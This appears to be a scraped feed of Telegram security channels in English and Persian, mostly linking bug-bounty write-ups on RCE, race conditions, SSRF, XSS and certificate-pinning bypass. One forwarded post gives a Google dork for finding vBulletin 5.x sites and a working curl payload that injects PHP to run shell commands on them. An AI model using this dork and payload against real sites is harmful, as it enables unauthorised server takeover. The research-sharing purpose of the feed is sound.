How i find Blind Remote Code Execution vulnerability
https://medium.com/@viveik.chauhan/blind-remote-code-execution-b9c4e119f7c3
#RCE
#Blind
#BugBounty
@web_priv8
https://medium.com/@viveik.chauhan/blind-remote-code-execution-b9c4e119f7c3
#RCE
#Blind
#BugBounty
@web_priv8
Medium
Blind Remote Code Execution
Introduction
banning users Race condition
https://wisdomfreak.com/2020/08/banning-users-race-condition/
#RC
#BugBounty
@web_priv8
https://wisdomfreak.com/2020/08/banning-users-race-condition/
#RC
#BugBounty
@web_priv8
WisdomFreak
Banning users Bug: Race condition - WisdomFreak
For example, you are booking a train ticket online and only a single seat ( assume seat no:5 ) is there. now you book a ticket for that seat and at the same
This media is not supported in your browser
VIEW IN TELEGRAM
Bypass Old Password with Array revive-adserver.com Bug Bounty
#Bypass
#BugBounty
#BugBountyTip
@web_priv8
#Bypass
#BugBounty
#BugBountyTip
@web_priv8
How to bypass Android certificate pinning and intercept SSL traffic
https://vavkamil.cz/2019/09/15/how-to-bypass-android-certificate-pinning-and-intercept-ssl-traffic/
#Android
#SSL
@web_priv8
https://vavkamil.cz/2019/09/15/how-to-bypass-android-certificate-pinning-and-intercept-ssl-traffic/
#Android
#SSL
@web_priv8
Kamil Vavra @vavkamil
How to bypass Android certificate pinning and intercept SSL traffic
Offensive website security Bug bounty Ethical hacking
آسیب پذیری RCE بر روی روترهای مبین نت
بخش انگلیسی:
https://link.medium.com/2QQKzATVM8
بخش فارسی:
https://vrgl.ir/3gZtC
#RCE
@web_priv8
بخش انگلیسی:
https://link.medium.com/2QQKzATVM8
بخش فارسی:
https://vrgl.ir/3gZtC
#RCE
@web_priv8
Forwarded from امنیت اطلاعات
Subdomains discover + HTTP check + content type/content size/response code + website title + IP + CNAME records + Screenshots of subdomain websites
https://github.com/Edu4rdSHL/findomain
https://asciinema.org/a/352218
#subdomain
#pentest
#bugbounty
@sec_nerd
https://github.com/Edu4rdSHL/findomain
https://asciinema.org/a/352218
#subdomain
#pentest
#bugbounty
@sec_nerd
GitHub
GitHub - Findomain/Findomain: The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP…
The fastest and complete solution for domain recognition. Supports screenshoting, port scan, HTTP check, data import from other tools, subdomain monitoring, alerts via Discord, Slack and Telegram, ...
Forwarded from امنیت اطلاعات
Reflected XSS in Facebook’s mirror websites
https://medium.com/@sudhanshur705/reflected-xss-in-facebooks-mirror-websites-4384b4eb3e11
#writeup
#xss
@sec_nerd
https://medium.com/@sudhanshur705/reflected-xss-in-facebooks-mirror-websites-4384b4eb3e11
#writeup
#xss
@sec_nerd
Forwarded from امنیت اطلاعات
0day RCE exploit on vBulletin 5xx
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
dork ; intext:"Powered by vBulletin"
POC
curl -s https://SITE/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo%20shell_exec("id"); exit;'
#vbulletin
#rce
#pentest
#web
@sec_nerd
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
همه چیز در خصوص SSRF
https://medium.com/swlh/intro-to-ssrf-beb35857771f
https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437
https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
#ssrf
#bugbounty
#pentest
#web
@sec_nerd
https://medium.com/swlh/intro-to-ssrf-beb35857771f
https://medium.com/@vickieli/exploiting-ssrfs-b3a29dd7437
https://medium.com/swlh/ssrf-in-the-wild-e2c598900434
https://medium.com/@vickieli/bypassing-ssrf-protection-e111ae70727b
#ssrf
#bugbounty
#pentest
#web
@sec_nerd
Medium
Intro to SSRF
And how your firewall failed you.
Forwarded from امنیت اطلاعات
Forwarded from امنیت اطلاعات
لیست جامعی از رایت آپ های کشف باگ در وبسایتهای بزرگ
از سال ۲۰۱۲ تا ۲۰۲۰
https://pentester.land/list-of-bug-bounty-writeups.html
#pentest
#bugbounty
@sec_nerd
از سال ۲۰۱۲ تا ۲۰۲۰
https://pentester.land/list-of-bug-bounty-writeups.html
#pentest
#bugbounty
@sec_nerd
RACE Condition vulnerability found in bug-bounty program
https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43
#RC
@web_priv8
https://medium.com/@pravinponnusamy/race-condition-vulnerability-found-in-bug-bounty-program-573260454c43
#RC
@web_priv8
Medium
RACE Condition vulnerability found in bug-bounty program
I have recently identified RACE condition vulnerability in Bug bounty program.
Forwarded from ناویا، ماشین کاوش اپلای
به تعداد راههای رسیدن به خدا، راه دور زدن مکانیزمهای امنیتی هم هست.
توی این گزارش، محقق با خوندن مستندات Content-type (یکی از سرآیندهای پروتکل HTTP) تونسته راههایی رو پیدا کنه که میشه ازش در دور زدن مکانیزمهای امنیتی تحت مرورگر و WAFها بهره گرفت.
@offsecmag
توی این گزارش، محقق با خوندن مستندات Content-type (یکی از سرآیندهای پروتکل HTTP) تونسته راههایی رو پیدا کنه که میشه ازش در دور زدن مکانیزمهای امنیتی تحت مرورگر و WAFها بهره گرفت.
@offsecmag
JSON Hijacking, SOP Bypass Technic with Cache-Control
https://www.hahwul.com/2020/01/12/json-hijacking-sop-bypass-technic-with-cache/
https://hackerone.com/reports/761726
#SOP
#CORS
#Bypass
@web_priv8
https://www.hahwul.com/2020/01/12/json-hijacking-sop-bypass-technic-with-cache/
https://hackerone.com/reports/761726
#SOP
#CORS
#Bypass
@web_priv8
Brute force directory & file to RCE
https://twitter.com/r00t98/status/1299449105350090753
#RCE
#BugBounty
#BugBountyTip
@web_priv8
https://twitter.com/r00t98/status/1299449105350090753
#RCE
#BugBounty
#BugBountyTip
@web_priv8